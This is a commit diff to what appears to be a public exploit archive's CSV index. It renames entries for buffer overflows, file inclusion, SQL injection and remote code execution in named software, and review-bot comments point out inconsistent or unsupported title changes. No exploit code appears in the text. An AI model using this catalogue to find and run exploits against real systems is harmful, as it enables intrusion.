DB: 2016-10-26

1 new exploits

WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow
WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Python)
WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow
WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Perl)
Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH) (PoC)
Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)
Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (Internet Explorer 7 / Firefox / Opera)
Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal Exploit
PHP-CON 1.3 - (include.php) Remote File Inclusion
PHP-CON 1.3 - 'include.php' Remote File Inclusion
RealPlayer 11 - Malformed AU File Denial of Service
RealPlayer 11 - '.au' Denial of Service
VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization (PoC)
VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization
Nullsoft Winamp 5.32 - MP4 tags Stack Overflow
Nullsoft Winamp 5.32 - MP4 Tags Stack Overflow
viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion
ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion
Samba 3.0.27a - send_mailslot() Remote Buffer Overflow (PoC)
Samba 3.0.27a - send_mailslot() Remote Buffer Overflow
Horde Web-Mail 3.x - (go.php) Remote File Disclosure
CuteNews 1.1.1 - (html.php) Remote Code Execution
Horde Web-Mail 3.x - 'go.php' Remote File Disclosure
CuteNews 1.1.1 - 'html.php' Remote Code Execution
TUTOS 1.3 - (cmd.php) Remote Command Execution
TUTOS 1.3 - 'cmd.php' Remote Command Execution
PHP Webquest 2.6 - (id_actividad) SQL Injection
Move Networks Quantum Streaming Player - Overwrite (SEH)
Gateway Weblaunch - ActiveX Control Insecure Method Exploit
PHP Webquest 2.6 - 'id_actividad' Parameter SQL Injection
Move Networks Quantum Streaming Player - SEH Overflow
Gateway Weblaunch - ActiveX Control Insecure Method
Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution
Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method
Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution
Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method
McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC)
McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC)
Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow
Microsoft Visual InterDev 6.0-SP6 - '.sln' Local Buffer Overflow
StreamAudio ChainCast ProxyManager - ccpm_0237.dll Buffer Overflow
StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Buffer Overflow
XnView 1.92.1 - Slideshow (FontName) Buffer Overflow
XnView 1.92.1 - (FontName) Slideshow Buffer Overflow
Phaos R4000 Version (file) - Remote File Disclosure
Phaos R4000 Version - 'file' Remote File Disclosure
ASPPortal Free Version (Topic_Id) - SQL Injection
ASPPortal Free Version - 'Topic_Id' SQL Injection
Alibaba Clone Tritanium Version (news_desc.html) - SQL Injection
Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection
XnView 1.97.4 - MBM File Remote Heap Buffer Overflow
XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow
Fortigate OS Version 4.x < 5.0.7 - SSH Backdoor
Fortigate OS 4.x < 5.0.7 - SSH Backdoor
Network Scanner Version 4.0.0.0 - SEH Crash (PoC)
Network Scanner 4.0.0.0 - SEH Crash (PoC)
Ruby on Rails - Dynamic Render File Upload Remote Code Execution
Ruby on Rails - Dynamic Render File Upload / Remote Code Execution
Network Scanner 4.0.0 - SEH Local Buffer Overflow
parent 8330920f32
commit f1ca42d762
3 changed files with 105 additions and 30 deletions
files.csv (59 lines changed)
|
@ -3143,14 +3143,14 @@ id,file,description,date,author,platform,type,port
|
|||
3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Inclusion",2007-03-13,the_day,php,webapps,0
|
||||
3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps,0
|
||||
3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0
|
||||
3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow",2007-03-14,"Winny Thomas",windows,remote,21
|
||||
3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Python)",2007-03-14,"Winny Thomas",windows,remote,21
|
||||
3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0
|
||||
3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
|
||||
3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0
|
||||
3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
|
||||
3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
|
||||
3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - (AdminBlogNewsEdit.asp) Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0
|
||||
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow",2007-03-15,"Umesh Wanve",windows,remote,21
|
||||
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Perl)",2007-03-15,"Umesh Wanve",windows,remote,21
|
||||
3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection",2007-03-15,x666,php,webapps,0
|
||||
3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0
|
||||
3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0
|
||||
|
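Review bot: The new title for 3482 drops "SEH Overflow", the one detail that distinguished it from 3474, and adds "(Windows 2000 SP4)", which the old title did not claim. After this change the two rows differ only by "(Python)" and "(Perl)", which the .py and .pl extensions in the file column already convey. Suggest keeping the technique in the 3482 title and confirming the SP4 target against 3482.pl before adding it.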
@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port
|
|||
4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - (index.php cat) SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0
|
||||
4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 - article.php SQL Injection",2007-11-22,Shadowleet,php,webapps,0
|
||||
4647,platforms/cgi/webapps/4647.txt,"KB-Bestellsystem - 'kb_whois.cgi' Command Execution",2007-11-22,"Zero X",cgi,webapps,0
|
||||
4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH) (PoC)",2007-11-23,h07,multiple,dos,0
|
||||
4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos,0
|
||||
4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0
|
||||
4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0
|
||||
4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 (Windows Vista / Windows XP) - RSTP Response Code Execution",2007-11-24,InTeL,windows,remote,0
|
||||
|
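Review bot: Row 4648 loses its "(PoC)" suffix but stays under platforms/multiple/dos with type dos, so the title now reads like a working exploit while the path says otherwise. Either keep the suffix or document that the type column alone carries that information. In the same hunk, the context row 4651 still reads "RSTP Response" beside the "RTSP Response" of the edited row; that typo is worth fixing in a title-normalisation pass.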
@ -4308,7 +4308,7 @@ id,file,description,date,author,platform,type,port
|
|||
4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0
|
||||
4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps,0
|
||||
4656,platforms/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0
|
||||
4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (Internet Explorer 7 / Firefox / Opera)",2007-11-26,muts,windows,remote,0
|
||||
4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal Exploit",2007-11-26,muts,windows,remote,0
|
||||
4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - disclaimer.php Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0
|
||||
4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0
|
||||
4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps,0
|
||||
|
@ -4321,7 +4321,7 @@ id,file,description,date,author,platform,type,port
|
|||
4667,platforms/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,php,webapps,0
|
||||
4668,platforms/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple SQL Injections",2007-11-27,Kacper,php,webapps,0
|
||||
4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 - (index.php act) Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0
|
||||
4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - (include.php) Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0
|
||||
4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - 'include.php' Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0
|
||||
4671,platforms/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0
|
||||
4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0
|
||||
4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal Exploit",2007-11-29,"Subreption LLC.",multiple,remote,0
|
||||
|
@ -4334,12 +4334,12 @@ id,file,description,date,author,platform,type,port
|
|||
4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0
|
||||
4681,platforms/php/webapps/4681.txt,"ftp Admin 0.1.0 - (Local File Inclusion / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2007-11-29,Omni,php,webapps,0
|
||||
4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0
|
||||
4683,platforms/windows/dos/4683.py,"RealPlayer 11 - Malformed AU File Denial of Service",2007-12-01,NtWaK0,windows,dos,0
|
||||
4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0
|
||||
4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion",2007-12-01,ShAy6oOoN,php,webapps,0
|
||||
4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0
|
||||
4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0
|
||||
4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0
|
||||
4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization (PoC)",2007-12-04,"Ricardo Narvaja",windows,dos,0
|
||||
4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization",2007-12-04,"Ricardo Narvaja",windows,dos,0
|
||||
4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0
|
||||
4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0
|
||||
4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0
|
||||
|
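Review bot: For 4683, the new title "'.au' Denial of Service" no longer says that the trigger is a malformed file, which "Malformed AU File Denial of Service" did. Suggest "'.au' File Denial of Service" or keeping "Malformed". Row 4688 also drops "(PoC)" while 4682, 4689 and 4690 in this same hunk keep it, so the dos rows are now labelled inconsistently.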
@ -4354,7 +4354,7 @@ id,file,description,date,author,platform,type,port
|
|||
4700,platforms/windows/remote/4700.txt,"simple httpd 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0
|
||||
4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 MP4 - File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
|
||||
4702,platforms/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 MP4 - File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0
|
||||
4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
|
||||
4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
|
||||
4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - (download_file.php) File Disclosure",2007-12-08,GoLd_M,php,webapps,0
|
||||
4705,platforms/php/webapps/4705.txt,"Flat PHP Board 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0
|
||||
4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 - 'index.php' SQL Injection",2007-12-09,S.W.A.T.,php,webapps,0
|
||||
|
@ -4373,7 +4373,7 @@ id,file,description,date,author,platform,type,port
|
|||
4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php template' Local File Inclusion",2007-12-11,MhZ91,php,webapps,0
|
||||
4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,windows,remote,0
|
||||
4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0
|
||||
4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0
|
||||
4722,platforms/php/webapps/4722.txt,"ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0
|
||||
4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0
|
||||
4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow",2007-12-12,muts,windows,remote,80
|
||||
4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0
|
||||
|
@ -4383,7 +4383,7 @@ id,file,description,date,author,platform,type,port
|
|||
4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - (filedownload.php) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0
|
||||
4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0
|
||||
4731,platforms/php/webapps/4731.php,"Adult Script 1.6 - Unauthorized Administrative Access",2007-12-13,Liz0ziM,php,webapps,0
|
||||
4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - send_mailslot() Remote Buffer Overflow (PoC)",2007-12-14,x86,linux,dos,0
|
||||
4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - send_mailslot() Remote Buffer Overflow",2007-12-14,x86,linux,dos,0
|
||||
4733,platforms/php/webapps/4733.txt,"123tkShop 0.9.1 - Remote Authentication Bypass",2007-12-14,"Michael Brooks",php,webapps,0
|
||||
4734,platforms/php/webapps/4734.txt,"Anon Proxy Server 0.1000 - Remote Command Execution",2007-12-14,"Michael Brooks",php,webapps,0
|
||||
4735,platforms/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-12-14,"Michael Brooks",php,webapps,0
|
||||
|
@ -4499,8 +4499,8 @@ id,file,description,date,author,platform,type,port
|
|||
4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4848,platforms/asp/webapps/4848.txt,"PortalApp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0
|
||||
4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - (parsedpage) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - (go.php) Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - (html.php) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - 'go.php' Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - 'html.php' Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-01-06,"Virangar Security",php,webapps,0
|
||||
4853,platforms/php/webapps/4853.php,"DCP-Portal 6.11 - SQL Injection",2008-01-06,x0kster,php,webapps,0
|
||||
4854,platforms/php/webapps/4854.txt,"SineCMS 2.3.5 - Local File Inclusion / Remote Code Execution",2008-01-06,KiNgOfThEwOrLd,php,webapps,0
|
||||
|
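Review bot: Rows 4850 and 4851 move the file name from parentheses to single quotes, but 4849 directly above still reads "(parsedpage)". If quoting is the new convention for file and parameter names, the neighbouring row should change in the same commit, otherwise searches by either style miss half the entries.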
@ -4510,23 +4510,23 @@ id,file,description,date,author,platform,type,port
|
|||
4858,platforms/php/webapps/4858.pl,"FlexBB 0.6.3 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
|
||||
4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Arbitrary File Upload / Authentication Bypass",2008-01-07,"Eugene Minaev",php,webapps,0
|
||||
4860,platforms/php/webapps/4860.pl,"Eggblog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
|
||||
4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - (cmd.php) Remote Command Execution",2008-01-07,Houssamix,php,webapps,0
|
||||
4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - 'cmd.php' Remote Command Execution",2008-01-07,Houssamix,php,webapps,0
|
||||
4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow",2008-01-07,"Thomas Pollet",linux,remote,0
|
||||
4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0
|
||||
4864,platforms/php/webapps/4864.txt,"ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
|
||||
4865,platforms/php/webapps/4865.txt,"evilboard 0.1a - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0
|
||||
4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow",2008-01-08,ryujin,windows,remote,0
|
||||
4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - (id_actividad) SQL Injection",2008-01-08,ka0x,php,webapps,0
|
||||
4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - Overwrite (SEH)",2008-01-08,Elazar,windows,remote,0
|
||||
4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0
|
||||
4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - 'id_actividad' Parameter SQL Injection",2008-01-08,ka0x,php,webapps,0
|
||||
4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overflow",2008-01-08,Elazar,windows,remote,0
|
||||
4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method",2008-01-08,Elazar,windows,remote,0
|
||||
4870,platforms/php/webapps/4870.txt,"osData 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",php,webapps,0
|
||||
4871,platforms/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password",2008-01-09,Dj7xpl,php,webapps,0
|
||||
4872,platforms/php/webapps/4872.txt,"PHP Webquest 2.6 - Get Database Credentials",2008-01-09,MhZ91,php,webapps,0
|
||||
4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0
|
||||
4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0
|
||||
4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0
|
||||
4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,windows,remote,0
|
||||
4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,php,webapps,0
|
||||
4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution",2008-01-09,"Luigi Auriemma",multiple,remote,7210
|
||||
4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0
|
||||
4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0
|
||||
4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution",2008-01-09,EgiX,php,webapps,0
|
||||
4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0
|
||||
4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,solaris,dos,0
|
||||
|
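Review bot: Row 4878 gains the version "8.5.2", a fact the old title did not carry and that nothing else in this diff supports; please confirm it against 4878.pl and mention the source in the commit message. The quoting pass in this hunk is also partial: 4873 and 4874 are converted, but 4879 just below still reads "(lib.regset.php)".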
@ -4540,9 +4540,9 @@ id,file,description,date,author,platform,type,port
|
|||
4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusion",2008-01-11,k1n9k0ng,php,webapps,0
|
||||
4890,platforms/php/webapps/4890.txt,"AJchat 0.10 - unset() bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0
|
||||
4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - (lib.regset.php/non-blind) SQL Injection",2008-01-11,rgod,php,webapps,0
|
||||
4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow",2008-01-11,shinnai,windows,local,0
|
||||
4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0-SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,windows,local,0
|
||||
4893,platforms/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",linux,dos,0
|
||||
4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - ccpm_0237.dll Buffer Overflow",2008-01-11,Elazar,windows,remote,0
|
||||
4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Buffer Overflow",2008-01-11,Elazar,windows,remote,0
|
||||
4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0
|
||||
4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'delete id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps,0
|
||||
4897,platforms/php/webapps/4897.pl,"photokron 1.7 - (update script) Remote Database Disclosure",2008-01-11,Pr0metheuS,php,webapps,0
|
||||
|
@ -4986,7 +4986,7 @@ id,file,description,date,author,platform,type,port
|
|||
5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0
|
||||
5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0
|
||||
5345,platforms/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0
|
||||
5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - Slideshow (FontName) Buffer Overflow",2008-04-02,haluznik,windows,local,0
|
||||
5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - (FontName) Slideshow Buffer Overflow",2008-04-02,haluznik,windows,local,0
|
||||
5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - (prefixdir) Local File Inclusion",2008-04-02,w0cker,php,webapps,0
|
||||
5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion",2008-04-02,w0cker,php,webapps,0
|
||||
5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 - (SP6) SLN File Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0
|
||||
|
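Review bot: Row 5349 in the trailing context still reads "Microsoft Visual InterDev 6.0 - (SP6) SLN File Local Buffer Overflow (PoC)", while this commit renames its sibling 4892 to "Microsoft Visual InterDev 6.0-SP6 - '.sln' Local Buffer Overflow". The two entries cover the same product and file type, so 5349 should get the same "6.0-SP6" and "'.sln'" form here.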
@ -5059,7 +5059,7 @@ id,file,description,date,author,platform,type,port
|
|||
5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0
|
||||
5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin",2008-04-09,t0pP8uZz,php,webapps,0
|
||||
5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure",2008-04-09,JIKO,php,webapps,0
|
||||
5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0
|
||||
5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version - 'file' Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0
|
||||
5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps,0
|
||||
5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - (category id) Blind SQL Injection",2008-04-10,irvian,php,webapps,0
|
||||
5423,platforms/php/webapps/5423.txt,"Ksemail - 'index.php language' Local File Inclusion",2008-04-10,dun,php,webapps,0
|
||||
|
@ -5404,7 +5404,7 @@ id,file,description,date,author,platform,type,port
|
|||
5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) SQL Injection",2008-06-10,Unohope,php,webapps,0
|
||||
